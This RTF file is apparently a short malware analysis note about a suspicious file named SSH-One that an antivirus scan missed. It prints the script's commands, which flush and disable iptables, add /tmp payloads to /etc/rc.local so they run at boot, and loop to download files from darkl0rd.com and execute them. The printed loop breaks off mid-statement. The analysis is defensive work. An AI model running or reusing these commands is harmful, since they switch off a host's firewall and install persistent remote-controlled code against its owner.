{\rtf1\ansi\ansicpg1252\cocoartf2513
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;\f1\fnil\fcharset0 .SFNSMono-Regular;\f2\fnil\fcharset0 .SFNSMono-Bold;
}
{\colortbl;\red255\green255\blue255;\red27\green31\blue35;\red255\green255\blue255;}
{\*\expandedcolortbl;;\cssrgb\c14118\c16078\c18431;\cssrgb\c100000\c100000\c100000;}
\paperw11900\paperh16840\margl1440\margr1440\vieww10800\viewh8400\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 One of the files in 
\f1 \cf2 \cb3 \expnd0\expndtw0\kerning0
/home/ubuntu/Downloads/ looks suspicious as well but it wasn\'92t detected by Clamscan. 
\f2\b The file is SSH-One.
\f1\b0  \
\
1. The script seems to work to disable iptables and check the if service is disabled: \
\
==============================================\
iptables -F\
/etc/init.d/iptables stop\
chkconfig iptables off\
==============================================\
\
\
2. Afterwards, it changes the values in the /tmp/SSH-T and /tmp/SSH-One files to the rc.local superuser startup script.  \
\
==============================================\
echo "chmod +x /tmp/SSH-T" >> /etc/rc.local\
echo "/tmp/SSH-T" >>  /etc/rc.local\
echo "chmod +x /tmp/SSH-One" >> /etc/rc.local\
echo "/tmp/SSH-One" >>  /etc/rc.local\
==============================================\
\
3. The scrip fetches data from some links and loops over both SSH-T and SSH-One to change permissions to execute the files: \
 \
==============================================\
m=SSH-T\
script=SSH-One\
hfs_m=http://darkl0rd.com:7758/SSH-T\
hfs_s=http://darkl0rd.com:7758/SSH-One\
rm -f /tmp/$m*\
while true\
\
do\
    ps aux | grep $m | grep -v grep\
    if [ $? -eq 0 ];then\
         sleep 10\
    else\
                ls -l /tmp/$m\
                        if [ $? -eq 0 ];then\
                         /tmp/$m\
                        else\
    cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m\
        fi\
   fi\
    ps aux | grep $script | grep -v grep\
    if [ $? -eq 0 ];then\
         sleep 10\
    else\
        ls -l /tmp/$script\
        if [ $? -eq 0];then\
==============================================\
\
4. The contacted links are: \
	- http://darkl0rd.com:7758/SSH-T\
	- http://darkl0rd.com:7758/SSH-One\
\
}